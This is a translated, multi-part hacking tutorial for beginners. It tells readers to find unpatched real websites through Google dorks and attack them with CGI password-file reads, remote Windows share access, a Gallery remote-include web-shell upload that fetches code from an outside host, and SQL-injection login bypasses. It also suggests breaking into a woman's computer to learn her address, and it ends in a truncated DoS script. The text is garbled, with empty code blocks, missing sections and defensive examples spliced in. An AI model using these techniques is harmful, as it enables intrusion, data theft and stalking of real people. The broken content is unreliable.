    _ CGI stands for Common Gateway Interface. Most websites use CGI programs (called CGI scripts) to carry out the necessary work 24 hours a day. CGI scripts are in fact programs that are written and uploaded to the website, mainly in the languages Perl, C, C++ and Vbscript, of which Perl is the most popular because programs are easy to write in it, it takes little space and, above all, it can run continuously 24 hours a day.

    _ Usually, CGI scripts are kept in the /cgi-bin/ directory of the website, as in the following example :

    http://www.company.com/cgi-bin/login.cgi

    with specific jobs such as :
    + Creating a counter of the number of visitors.
    + Determining what guests may and may not do on your website.
    + Managing members' user names and passwords.
    + Providing a mail service.
    + Providing link pages and handling messages between members.
    + Providing detailed error messages, etc.

    24 . ) The most basic way of hacking a website through a CGI script :

    _ Bug 1 : the nph-test-cgi bug

    + Type the name of the vulnerable website into your browser.
    + Type the following at the end : /cgi-bin/nph-test-cgi
    + The URL will then look like this :

    http://www.servername.com/cgi-bin/nph-test-cgi

    + If it succeeds you will see the directories stored inside. To look into a directory, type next :

    CODE
    ?/*

    + The file containing the passwords is usually kept in the /etc directory; type the following line in the URL :

    http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*

    _ Bug 2 : the php.cgi bug

    + As above, you only need to type the following line in the URL to get the passwords :

    http://www.servername.com/cgi-bin/php.cgi?/etc/passwd

    The important point is that these are old bugs, so finding websites to practise on is very hard. Go to google.com and type the keyword :

    /cgi-bin/php.cgi?/etc/passwd
    or
    cgi-bin/nph-test-cgi?/etc

    then look through the results to see which sites have not fixed the bug, and practise on them.

    25 . ) The technique of breaking into a computer that is online :

    _ Breaking into a computer that is online is a technique that is both easy and hard. You could call it easy when you use the ENT 3 tool, but you will run into a problem with it : the victim's machine slows down considerably, and machines that do not share anything cannot be entered, so if they switch the machine off your work is wasted before you have managed to swipe an account. There is a quieter way, which slows the machine down less and can get in even when the victim is not sharing : using DOS programs to attack. Ok, let us begin :

    _ Use an IP scanner such as ENT 3 to scan the target IP.
    _ Go to Start ==> Run and type the command cmd.
    _ In the DOS window type the command net view

    CODE
    + Example : c:\net view 203.162.30.xx

    _ Look at the result. If the machine has shares then it is very easy; you only need to type the command

    net use :

    + Example : c:\net use E : 203.162.30.xxC

    _ If connecting to the victim's machine asks for a password, download a password-guessing program and use it (in my opinion you should get the program "pqwak2" for guessing passwords on machines running Win98 or Winme, and the program "xIntruder" for Win NT). Note that the two programs are used in a similar way : on the first line we type the victim's IP, on the second line the name of the victim's shared drive; but with "xIntruder" take care to set its Delay sensibly : on a LAN the Delay is 100, on the Internet it is around 5000.

    _ If the victim's machine has no shares, we type the command :

    net use : c$ (or d$)"administrator"


    + Example : net use E : 203.162.30.xxC$"administrator"

    Sharing through c$ is the default on all machines, and the USER is "administrator".
    _ We can use this method to break into the computer of the girl we secretly admire, to look for data about her address (provided that she is using her home machine and that you are lucky enough to find that address). You only need to chat on Y!Mass and then go to DOS and type the command :

    c:\netstat -n

    When using this method, close all other windows and leave only the Y!Mass chat window with her; this makes it easier to identify her IP address. Then use the intrusion method I described above. (Perhaps our friend tykhung, back when he was courting a faraway girl over the network, also used this method to break in and find out her address, hee hee.)
    You will succeed if the victim's machine has no firewall or proxy installed.

    ================================================== = =

    Many of you have asked me to give exact addresses for you to practise on, but I cannot, having learned from tutorials that gave exact addresses : once people had finished practising and gained admin rights, some of them deleted the site's database. That way HVA would get the reputation of being the source of vandalism on the network. Please understand; where possible I will only describe ways for you to find vulnerable addresses, and will not give any specific address.

    ================================================== = =

    In part 4 I will cover the technique of protecting your own computer against intrusion while you are online, an overview of the steps taken when we decide to hack a website, the technique of finding vulnerable websites to practise on, the technique of hacking a website through the Gallery bug, etc.

    GOODLUCK!!!!!!!!!

    ( End of part 3 )
    Anhdenday
    HVA

    The most basic knowledge for becoming a Hacker - Part 4

    26 . ) Understanding RPC (Remote Procedure Call) :

    _ Windows NT provides the ability to use RPC to run distributed applications. Microsoft RPC comprises the libraries and services that allow distributed applications to work in the Windows NT environment. Distributed applications consist of several processes, each carrying out a defined task. These processes can run on one or more computers.

    _ Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must go together with the Microsoft RPC name service interface (NIS). NIS comprises the API functions that allow access to multiple entries in the same name service database (the name service database holds the entries, groups of entries and the history of the entries on the server).


    When Windows NT is installed, Microsoft Locator is automatically selected as the name service provider. It is the best-suited name service provider for the Windows NT network environment.

    27 . ) A simple technique for resisting unauthorised intrusion through RPC (Remote Procedure Call) while online :

    _ If you suspect that someone is getting into your machine, or that an admin is watching you through remote desktop, you only need to turn off the remote procedure call function; at present no program can then use remote desktop to watch you. It also blocks most tools for breaking into a machine (because most of these tools connect by means of remote procedure call (over tcp/ip)). Most trojans also rely on this protocol.

    How to turn it off : go to service / remote procedure call (right click), choose startup type / disable or manual / apply.

    This is a very effective defence for a PC, and if you add turning off file sharing you become very hard to hack, but on a LAN it will also cause you a fair amount of trouble, because you will not be able to run the programs that depend on it. Choose sensibly according to how you work. In my opinion, if you are on a LAN, installing a firewall is certain to make you reasonably safe.

    ( Based on the article by our brother khoaimi, admin of HVA )

    28 . ) The steps for hacking a website today :

    _ According to the list in the book Hacking Exposed 3, to hack a website we normally carry out the following steps :

    + FootPrinting : ( leaving footprints )
    This is what a hacker does to gather as much information as possible about the server/business/user. It covers details of IP addresses, Whois, DNS, etc., and sometimes official information related to the target. Often the hacker simply uses search tools on the network to find this information.

    + Scanning : ( probing scans )
    Once the information is in hand, the next step is to assess and identify the services the target offers. This includes port scanning, identifying the operating system, etc. The tools used here include nmap, WS pingPro, siphon, fscam and many others.

    + Enumeration : ( listing to find holes )
    The third step is to look for poorly protected resources, or user accounts that can be used to get in. It covers default passwords and default scripts and services. Many network administrators do not know about these defaults or do not change them.

    + Gaining Access : ( finding a way in )
    Now the intruder looks for a way into the network using the information gathered in the three steps above. The method used here may be an attack on a buffer overflow bug, fetching and decoding the password file, or, crudest of all, brute forcing (checking every case of) the password. The tools commonly used at this step are NAT, podium, or L0pht.

    + Escalating Privileges : ( climbing in privilege )
    For example, when the hacker has got into the network with a guest account, they will look for a way to take control of the whole system. The hacker will try to ***** the admin's password, or use a hole to escalate privileges. John and Riper are two password-cracking programs that are very often used.

    + Pilfering : ( used when files containing passwords are left exposed )
    Once again search engines are used to find ways of getting into the network. Text files containing passwords, or other insecure mechanisms, can be easy prey for the hacker.


    + Covering Tracks : ( erasing traces )
    After obtaining the necessary information, the hacker tries to erase the traces and delete the operating system's log files, so that the administrator does not notice the system has been entered or, if they do find out, cannot work out who the intruder was.

    + Creating "Back Doors" : ( making a back door so that the next intrusion is easier )
    The hacker leaves "Back Doors", that is, a mechanism that lets the hacker get back in by a secret route without much effort, by installing a Trojan or creating a new user (in an organisation with many users). The tools here are the various Trojans and keyloggers.

    + Denial of Service (DoS) : ( denial-of-service attack )
    If the intrusion does not succeed, DoS is the last means of attacking the system. If the system is not configured properly, it will break and let the hacker in. In other cases DoS will stop the system from working at all. The tools often used for DoS attacks are trin00, Ping Of Death, teardrop, and the various nukers and flooders. This method is very powerful and is still widely used today.

    _ Depending on their knowledge and level, a hacker may skip some steps. It is not essential to follow them in order. Remember the saying "know the enemy and know yourself, and in a hundred battles you will win a hundred times".

    ( Material from HVA and hackervn.net )

    29 . ) How to find vulnerable websites :

    _ You surely know the websites that specialise in searching for information on the network? But you probably did not expect that we can use those sites to find vulnerable websites (I regularly use google.com and recommend that you use it too, because it is very powerful and effective).

    _ If you are interested in a website bug and want to find sites that have it, you only need to go to google.com and type that bug string after "allinurl : ". For example, we have the following website bug string :

    cgi-bin/php.cgi?/etc/passwd

    you will type :

    allinurl:cgi-bin/php.cgi?/etc/passwd

    It will list the websites that have this bug. Look at the bottom of each listed entry (the address line in green); if a line matches the keyword you entered exactly, then that site has had or still has the bug. Whether you can get in or not also depends on whether the website has fixed the bug yet.

    _ If you are interested in forum bugs and want to find forums of this kind to practise on, just enter the keyword

    powered by

    The following example finds forums that use Snitz 2000 :

    powered by Snitz 2000

    _ However, the chance of finding exactly the right vulnerable forum or website this way is not high. Pay attention to the special string in the URL that is characteristic of each kind of website or forum (this is very important; study it further on your own). For example, when searching for the Hosting Controller bug we have the following characteristic strings

    "/admin or /advadmin or /hosting"


    we type the keyword :

    allinurl:/advadmin
    or allinurl:/admin
    or allinurl:/hosting

    It will list the websites whose URLs have the form :

    http://tentrangweb.com/advadmin
    or http://tentrangweb.com/admin
    or http://tentrangweb.com/hosting

    For example, for UBB forums the characteristic string is

    "cgi-bin/ultimatebb.cgi?"

    We search in the same way as above.
    Once you know how to search like this, from then on you only need to follow the updates on HVA's "Security bugs" page, posted daily by LeonHart; you will understand what they mean and can check them yourself.

    30 . ) The technique of hacking a website through the Gallery bug ( a form of php code inject bug ) :

    _ Gallery is a tool, written in PHP, for creating a photo gallery on the web. Taking advantage of this flaw, we can add PHP code that lets us upload, which is our main aim.

    _ First register a free host; it is easiest to register at brinkster.com. Then open notepad and create a PHP file with the following code :

    CODE


    this init.php up early, because we will use it a lot with other snippets; if you forget to upload this file you are finished )

    Create one more PHP file with the following code :

    CODE


    + Discard the directories shown as . or .. because these are the root directory or virtual directories (they are usually at the top of the result rows).
    + Also discard rows whose last word has an extension (for example config.php, check.inc, etc.) because these are files, not directories.
    + What remains are directories that can be uploaded to, but I advise you to choose rows whose directory name has a number greater than 1 (you can tell by looking at the second column from the left), because that both makes sure it is a real directory and not a virtual one, and makes it hard for the website's admin to notice when we put our file in. As an example, I find the directory loveyou, which contains 12 files and lets us upload, so the actual path we upload to will be :

    /home/abc/xyz/Gallery/loveyou

    Now go to your host account and edit the contents of init.php to be the same as the code of upload.php, but change *PATH* to "/home/abc/xyz/gallery/loveyou/". At the same time prepare an upload.php file on your own machine with *PATH* set to "" ( 2 double quotes ).
    Now we can upload the upload.php file to the victim's website. Enter the following address in your web browser :

    http://<the victim's website>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /

    You will then see a rectangular box with 2 buttons beside it, one a browse button and one an upload button. Use the browse button to point to the upload.php file you prepared on your machine; when you press the upload button it will upload upload.php to the victim's website. Ok, you can now consider the road to hacking the website complete. From now on, use it to attack the opponent, for example to take the database or passwords (do it as in the earlier hacking tutorials), but you should only practise, and not delete their database or wreck their website. If you are a true hacker you only need to upload to the website the line : "Hack by .." and that is enough.
    As on previous occasions, whether you succeed or not depends on your luck and on your persistence in studying and applying what you know.

    ( Based on the hacking tutorial by brother vnofear, viethacker.net )

    GOODLUCK!!!!!!!!!!!!

    ( End of part 4 )
    Anhdenday
    HVA

    The most basic knowledge for becoming a Hacker - Part 5

    31 . ) What is a TCP/IP packet?

    TCP/IP stands for Transmission Control Protocol and Internet Protocol. A TCP/IP packet is a compressed block of data to which a header is attached and which is then sent to another computer. This is how the internet carries information : by sending packets. The header of a packet contains the IP address of the sender. You can rewrite a packet and make it look as if it comes from someone else!! You can use this to try to get into a great many systems without being caught. You will have to run Linux or have a program that lets you do this.


    32 . ) What is Linux :

    _ In the original sense, Linux is the kernel of the operating system. The kernel is a piece of software responsible for communication between application programs and the hardware. It provides functions such as : file management, virtual memory management, and input/output devices such as hard disks, screens, keyboards, .... But the Linux kernel alone is not yet an operating system, so it has to be combined with application programs written by the GNU organisation to form a complete operating system : the Linux OS. This is also why we see GNU/Linux when Linux is mentioned.
    Next, a company or an organisation packages these products (the kernel and the application programs), adjusts some configuration to carry the mark of that company/organisation, and adds an installation process for that Linux set; this gives us a Distribution. Distributions differ in the number and kind of software packaged, in the installation process, and in the kernel version. Some of the major Linux distributions today are : Debian, Redhat, Mandrake, SlackWare, Suse.

    33 . ) The basic commands to know when using or breaking into a Linux system :

    _ The "man" command : when you want to know how to use a command, you can use this one :
    Command structure : $ man .
    Example : $ man man

    _ The "uname" command : gives basic information about the system.
    Example : $uname -a ; it will print the following information :

    Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

    _ The id command : shows the current uid/gid (the current group and name).

    _ The w command : shows the users who are logged in and what they are doing on the system.
    Example : $w will print the following information :

    10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

    _ The ps command : shows information about the processes on the system.
    Example : $ps axuw

    _ The cd command : when you want to move to a directory you need this command.
    Example : $ cd /usr/bin ----> it will take you to the bin directory

    _ The mkdir command : creates a directory.
    Example : $ mkdir /home/convit ---> it will create a directory convit in /home

    _ The rmdir command : removes a directory.
    Example : $ rmdir /home/conga ----> it will remove the directory conga in /home

    _ The ls command : lists the contents of a directory.
    Example : $ls -laR /

    _ The printf command : prints formatted data, like using printf() in C++.
    Example : $printf %s "\x41\x41\x41\x41"

    _ The pwd command : prints the current directory.
    Example : $pwd ------> it tells us where we currently are : /home/level1

    _ The commands cp, mv, rm mean : copy, move, delete a file.
    Example with rm (del) : $rm -rf /var/tmp/blah -----> it will delete the file blah.
    Do the same for the cp and mv commands.

    _ The find command : searches for files and directories.
    Example : $find / -user level2

    _ The grep command : a search tool; the simplest usage is : grep "something"
    Example : $ps axuw | grep "level1"


    _ The strings command : prints all printable characters in a file. Use it to find string declarations in a program, or system calls; sometimes you even find passwords.
    Example : $strings /usr/bin/level1

    _ The strace command : (linux) traces system calls and signals; extremely useful for following the flow of a program, and the fastest way to find out where a program is failing. On other unix systems the equivalent tools are truss and ktrace.
    Example : $strace /usr/bin/level1

    _ The "cat, more" commands : print the contents of a file to the screen.

    $cat /etc/passwd | more --> it will print the contents of the passwd file as quickly as possible.
    $more /etc/passwd ----> it will print the contents of the passwd file gradually.

    _ The hexdump command : prints the input data as the corresponding ascii, hex, octal and decimal values.
    Example : $echo AAAA | hexdump

    _ The commands cc, gcc, make, gdb : tools for compiling and debugging.
    Example : $gcc -g -o bof bof.c
    Example : $make bof
    Example : $gdb level1
    (gdb) break main
    (gdb) run

    _ The perl command : a language.
    Example : $perl -e 'print "A"x1024' | ./bufferoverflow ( a buffer overflow when we feed in 1024 characters )

    _ The "bash" command : the time has come to automate your tasks with shell scripts, which are extremely powerful and flexible.
    If you want to learn about bash and see what it is like :
    $man bash

    _ The ls command : shows the contents of a directory ( lists the files in a directory ).
    Example : $ ls /home ----> shows all the files in the home directory
    $ ls -a -----> shows all files, including hidden files
    $ ls -l -----> gives information about the files

    _ Writing a command's output to a file :
    Example : $ ls /usr/bin > ~/convoi ------> writes the listing of the bin directory to a file convoi.

    34 . ) Basic knowledge around Linux :

    a . ) Some important directories on a server :

    _ /home : where users' files are kept ( e.g. someone who logs in to the system as convit will have a directory /home/convit )
    _ /bin : where the essential basic Unix commands live, such as ls.
    _ /usr/bin : where other special commands live, commands used by special users and for system administration.
    _ /boot : where the kernel and the other files used at boot time are kept.
    _ /etc : files for network operation, NFS (Network File System) and mail ( this is the key place that we need to exploit the most )
    _ /var : administrative files
    _ /usr/lib : standard libraries such as libc.a
    _ /usr/src : where the source of programs is kept.

    b . ) Location of the file containing the passwords on various systems :


    CODE
    AIX 3                   /etc/security/passwd              !
                            /tcb/auth/files//
    A/UX 3.0s               /tcb/files/auth/?/*
    BSD4.3-Reno             /etc/master.passwd                *
    ConvexOS 10             /etc/shadpw                       *
    ConvexOS 11             /etc/shadow                       *
    DG/UX                   /etc/tcb/aa/user/                 *
    EP/IX                   /etc/shadow                       x
    HP-UX                   /.secure/etc/passwd               *
    IRIX 5                  /etc/shadow                       x
    Linux 1.1               /etc/shadow                       *
    OSF/1                   /etc/passwd[.dir|.pag]            *
    SCO Unix #.2.x          /tcb/auth/files//
    SunOS4.1+c2             /etc/security/passwd.adjunct      ##username
    SunOS 5.0               /etc/shadow
    System V Release 4.0    /etc/shadow                       x
    System V Release 4.2    /etc/security/* database
    Ultrix 4                /etc/auth[.dir|.pag]              *
    UNICOS                  /etc/udb                          *

    35 . ) Exploiting Linux through the security hole in the WU-FTP server :

    _ WU-FTP Server (developed by the University of Washington) is FTP server software that is quite widely used on Unix & Linux systems (all distributors : Redhat, Caldera, Slackware, Suse, Mandrake....) and also on Windows.... Hackers can execute their own commands remotely through file globbing by overwriting files that exist on the system.

    _ However, exploiting this bug is not easy, because the following conditions must all be met :
    + You must have an account on the server.
    + You must be able to place shellcode in the memory of the server process.
    + You must send a special FTP command containing a special globbing pattern without the server detecting an error.
    + The hacker overwrites a function or code pointer so that it leads to the shellcode, which may then be executed by the FTP server itself.

    _ Let us analyse the following example of overwriting on the FTP server :

    CODE
    ftp > open localhost


    26265 tty3 R 0:00 bash -c ps ax | grep ftpd
    (gdb) at 26256
    Attaching to program: /usr/sbin/wu.ftpd, process 26256


    If that does not work, try next with the following logins and passwords :

    CODE
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

    If it succeeds, you can log in without needing to know the username and password.
    This bug is related to queries, so anyone who has studied databases can exploit it easily, simply by typing query commands in the browser. If you want to study this bug more thoroughly, you can look for the articles by the vicky group.

    37 . ) An example of hacking a website through the admentor bug ( a form of SQL Injection bug ) :

    _ First go to google.com and find admentor websites with the keyword "allinurl : admentor".

    _ Usually you will get the following result :

    http://www.someserver.com/admentor/admin/admin.asp

    _ Try entering "' or ''='" as login and password :

    CODE
    Login : ' or ''='
    Password : ' or ''='

    _ If it succeeds you will get into the vulnerable website as admin.
    _ Let us look at how to fix this bug :
    + Filter special characters such as ' " ~ \ by inserting the following code into the javascript :

    CODE
    function RemoveBad(strTemp) {
        // Strip every character listed in the pattern from the input
        strTemp = strTemp.replace(/\ |\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
        return strTemp;
    }

    + And call it from inside the asp script :

    CODE
    var login = RemoveBad(Request.QueryString("login"));
    var password = RemoveBad(Request.QueryString("password"));


    _ So we have fixed the bug.
    _ You can apply this hacking method to other websites that submit data; go ahead and test it. Websites in our Vietnam have this a lot; I have already collected quite a few admin passwords by trying this (but I also reported it so that they could fix it).
    _ On many sites the login is not done with "' or ''='" but with real nicknames registered on that website; go to the "members" link, find the nick of an admin and test with it. Happy hacking.
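The login bypass above works because the submitted text is pasted into the SQL statement, so the durable fix is to bind the values as parameters instead of filtering characters. The following is an added example, not code from the original article or from AdMentor: it uses Python's sqlite3 with a constructed table to show the concatenated query accepting `' or ''='`, the same query with bound parameters rejecting it, and a side effect of the character-stripping filter. Table, column and function names are assumptions.

```python
import re
import sqlite3

BYPASS = "' or ''='"                 # the input quoted in the article
SAMPLE_PASSWORD = "S3cret-(constructed)"


def make_db():
    """Constructed sample database holding a single admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (login TEXT PRIMARY KEY, password TEXT)")
    # Plain text only to keep the demo short; store a salted hash in real code.
    db.execute("INSERT INTO admins VALUES (?, ?)", ("webmaster", SAMPLE_PASSWORD))
    return db


def login_concatenated(db, login, password):
    """Vulnerable form: user input becomes part of the SQL text."""
    sql = ("SELECT login FROM admins WHERE login = '" + login +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, login, password):
    """Hardened form: the driver passes the values separately from the SQL text."""
    sql = "SELECT login FROM admins WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None


def remove_bad(text):
    """Python port of the article's RemoveBad() filter (same character list)."""
    return re.sub(r"[ \"'%;()&+\-]", "", text)


def login_filtered(db, login, password):
    """The article's fix: strip characters, then still concatenate."""
    return login_concatenated(db, remove_bad(login), remove_bad(password))


if __name__ == "__main__":
    db = make_db()
    print("concatenated accepts bypass :", login_concatenated(db, BYPASS, BYPASS))
    print("parameterized accepts bypass:", login_parameterized(db, BYPASS, BYPASS))
    print("filtered accepts bypass     :", login_filtered(db, BYPASS, BYPASS))
    # The filter also rewrites legitimate credentials that contain listed characters.
    print("filtered accepts real login :", login_filtered(db, "webmaster", SAMPLE_PASSWORD))
    print("parameterized accepts real  :", login_parameterized(db, "webmaster", SAMPLE_PASSWORD))
```

The filter does stop this particular input, but it silently changes any password containing the listed characters, which is why bound parameters are the preferred repair.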

    ================================================== = =

    In part 6 I will cover the denial-of-service attack ( DoS attack ), a powerful kind of attack that brought even a mighty website like our HVA to a standstill within a short time, while the admins were all out drinking coffee and nobody was watching. Along with it come the DoS attack methods that have been and are being used.

    GOODLUCK!!!!!!!!!!!!!!!!!!!!

    ( End of part 5 )

    Anhdenday
    HVA

    The most basic knowledge for becoming a Hacker - Part 6

    38 . ) What is a DoS attack ? ( Denial Of Services Attack )

    _ A DoS attack ( denial-of-service attack ) is a very powerful kind of attack. With this kind of attack, one computer connected to the Internet is all you need to attack the other side's computer. In essence, in a DoS attack the hacker takes up a large amount of resources on the server ( the resources may be bandwidth, memory, cpu, hard disk, ... ) so that the server cannot respond to requests from other people's machines ( the machines of ordinary users ), and the server may quickly stop working, crash or reboot.

    39 . ) The kinds of DoS attack currently known and in use :

    a . ) Winnuke :

    _ This kind of DoS attack only works against computers running Windows9x. The hacker sends packets with "Out of Band" data to port 139 of the target computer. ( Port 139 is the NetBIOS port; this port only accepts packets with the Out of Band flag set. ) When the victim's computer receives such a packet, a blue error screen is shown to the victim, because Windows receives these packets but does not know how to react to the Out Of Band data, and the system crashes.

    b . ) Ping of Death :

    _ In this kind of DoS attack, we only need to send a data packet of large size to the target machine with the ping command and their system will hang.
    _ Example : ping -l 65000


    c . ) Teardrop :

    _ As we know, all data travelling over the network from the source system to the destination system has to go through 2 processes : the data is split into small fragments at the source system, and each fragment must carry a definite offset value that identifies its position in the data packet being sent. When the fragments reach the destination system, the destination system uses the offset values to put the fragments back together in the original order. Taking advantage of this, we only need to send the destination system a series of packets whose offset values overlap one another. The destination system cannot reassemble these packets, loses control, and may crash, reboot or stop working if the number of packets with overlapping offset values is too large !
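The defence against Teardrop is for the receiver (or a filter in front of it) to validate offsets before reassembling. This added example, which is not from the original article, checks one datagram's fragments for overlapping offsets, and goes slightly beyond the text by also rejecting a set that would reassemble to more than the 65535-byte IPv4 maximum, the condition behind Ping of Death. The tuple layout, the labels and the sample fragment lists are constructed assumptions.

```python
MAX_DATAGRAM = 65535      # largest IPv4 datagram (16-bit total length field)


def check_fragments(fragments, header_len=20):
    """Validate the fragments of ONE datagram before reassembly.

    fragments: iterable of (offset_units, payload_len, more_fragments), where
    offset_units is the IPv4 fragment offset field (counted in 8-byte units).
    Returns a sorted list of problem labels; an empty list means the set is sane.
    """
    problems = set()
    spans = []
    last_count = 0
    for offset_units, payload_len, more in fragments:
        start = offset_units * 8
        end = start + payload_len
        if payload_len <= 0:
            problems.add("empty-fragment")
        if more and payload_len % 8:
            # Every fragment except the last must carry a multiple of 8 bytes.
            problems.add("misaligned-fragment")
        if header_len + end > MAX_DATAGRAM:
            # Reassembly would exceed what the length field can describe.
            problems.add("oversize-reassembly")
        if not more:
            last_count += 1
        spans.append((start, end))
    if last_count != 1:
        problems.add("bad-last-fragment-count")

    # Walk the fragments in offset order and compare each start with the
    # number of bytes already covered.
    covered = 0
    for start, end in sorted(spans):
        if start < covered:
            problems.add("overlap")          # Teardrop-style offsets
        elif start > covered:
            problems.add("gap")              # a fragment is still missing
        covered = max(covered, end)
    return sorted(problems)


# Constructed samples -------------------------------------------------------
NORMAL = [(0, 1480, True), (185, 1480, True), (370, 1040, False)]
# Second fragment starts at byte 24, inside the 40 bytes already delivered.
TEARDROP = [(0, 40, True), (3, 8, False)]
# 45 contiguous fragments of 1480 bytes: the last one ends at byte 66600.
PING_OF_DEATH = [(i * 185, 1480, i < 44) for i in range(45)]


if __name__ == "__main__":
    for name, sample in (("normal", NORMAL), ("teardrop", TEARDROP),
                         ("ping of death", PING_OF_DEATH)):
        print(name, check_fragments(sample) or "ok")
```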

    d . ) SYN Attack :

    _ In a SYN Attack, the hacker sends the destination system a series of SYN packets with source ip addresses that do not exist. When the destination system receives these SYN packets it replies to those non-existent addresses and waits for a response from the fake ip addresses. Because these ip addresses do not exist, the destination system waits in vain and also puts these waiting "requests" into memory, wasting a considerable amount of memory on the server that should have been used for other work instead of waiting for a response that will never come. If we send many packets with fake IP addresses like this at the same time, the system becomes overloaded and crashes or reboots. ==> throwing the stone and hiding the hand.

    e . ) Land Attack :

    _ A Land Attack is much like a SYN Attack, but instead of using ip addresses that do not exist, the hacker uses the ip address of the victim system itself. This creates an endless loop inside the victim system itself, between one side that needs to receive a response and another side that never sends that response. ==> beaten with one's own stick.

    f . ) Smurf Attack :

    _ A Smurf Attack needs three components : the hacker ( who orders the attack ), the amplifying network ( which obeys the hacker ) and the victim's system. The hacker sends ICMP packets to the broadcast address of the amplifying network. The special point is that these ICMP packets have the victim's ip address as their source ip address. When those packets reach the broadcast address of the amplifying network, the computers in the amplifying network believe that the victim's computer sent the ICMP packets and all send ICMP reply packets back to the victim's system at once. The victim's system cannot withstand this huge volume of packets and quickly stops working, crashes or reboots. So by sending only a small number of ICMP packets, the amplifying network multiplies the number of ICMP packets many times over. The amplification ratio depends on the number of computers in the amplifying network. The hackers' task is to take over as many networks or routers as possible that allow packets to be passed directly to the broadcast address without source-address filtering at the points where the packets leave. With such systems in hand, the hacker can easily carry out a Smurf Attack on the systems to be attacked. ==> one machine alone is nothing to fear, ten machines together will beat you.

    g . ) UDP Flooding :

    _ The UDP attack requires 2 systems to take part. The hackers put their own system into a loop exchanging data over the UDP protocol, forge the ip address of the packets as the loopback address ( 127.0.0.1 ), and send these packets to the victim's system on the UDP echo port ( 7 ). The victim's system replies to the messages sent by 127.0.0.1 ( itself ), and the result is that it goes round in an endless loop. However, many systems do not allow the loopback address to be used, so the hacker forges the ip address of some computer on the victim's network and floods the victim's system with UDP. If you try this and it does not succeed, it is your own machine that will suffer.

    h . ) DNS attack :

    _ The hacker can change an entry on the Domain Name Server of the victim's system and make it point to some website of the hacker's. When a client asks DNS to resolve the compromised address into an ip address, DNS ( whose cache the hacker has altered ) immediately returns the ip address the hacker made it point to. The result is that, instead of reaching the website they wanted, the victims reach a website created by the hacker. A truly effective denial-of-service attack !

    g . ) Distributed DoS Attacks ( DDos ) :

    _ DDoS requires at least several hackers to take part. First the hackers try to get into poorly secured computer networks and then install the DDoS server program on these systems. The hackers then agree on a time at which they will use the DDoS client to connect to the DDoS servers, and then simultaneously order these DDoS servers to carry out the DDoS attack on the victim's system.

    h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :

    _ This is perhaps the most powerful kind of attack, and the one that reboots the opponent's computer most quickly and neatly. The method is similar to DDos, but instead of attacking with many computers the attacker only needs one machine, attacking through the large servers of the world. Still using the method of forging the victim's IP address, the attacker sends packets to the most powerful and fastest servers with the widest links, such as Yahoo etc., and these servers send their replies to the victim's address. Receiving many packets at once through these large servers quickly clogs the victim's link and makes that computer crash or reboot. What makes this attack powerful is that a single machine with a simple Internet connection and an ordinary link can knock out a system with the best link in the world if it is not stopped in time. Our HVA website was recently hit by a DoS using exactly this method.

    40 . ) The technique of DoS-ing a website with Python :

    _ This technique can only be used on WinNT, and you need time before the victim's computer goes down.
    _ Download Python from http://www.python.org/ to use it.
    _ Save the following code to the file rfpoison.py.

    CODE
    import string
    import struct
    from socket import *
    import sys

    def a2b(s):
        bytes = map(lambda x: string.atoi(x, 16), string.split(s))
        data = string.join(map(chr, bytes), '')
        return data


    def b2a(s):bytes = map(lambda x: `%.2x` % x, map(ord, s))return string.join(bytes, ` `)

    # Yu cu tp hp NBSSnbss_session = a2b(``````

    81 00 00 48 20 43 4b 46 44 454e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 4341 43 41 43 41 43 41 43 41 43 41 00 20 45 48 4542 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 4643 43 41 43 41 43 41 43 41 43 41 41 41 00 00 0000 00``````)

    # To SMBcrud = (# Yu cu SMBnegprot``````ff 53 4d 42 72 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 4320 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 204e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 3000 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00``````,# Yu cu setup SMB X``````ff 53 4d 42 73 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ffff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 0000 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f55 50 00 55 6e 69 78 00 53 61 6d 62 61 00``````,# Yu cu SMBtconX

    ``````ff 53 4d 42 75 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 0000 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 5645 52 5c 49 50 43 24 00 49 50 43 00``````,# Yu cu khI to SMBnt X``````ff 53 4d 42 a2 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00

    00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 0007 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 0000 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00

    00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 7276 73 76 63 00``````,# yu cu bin dch SMB``````ff 53 4d 42 25 00

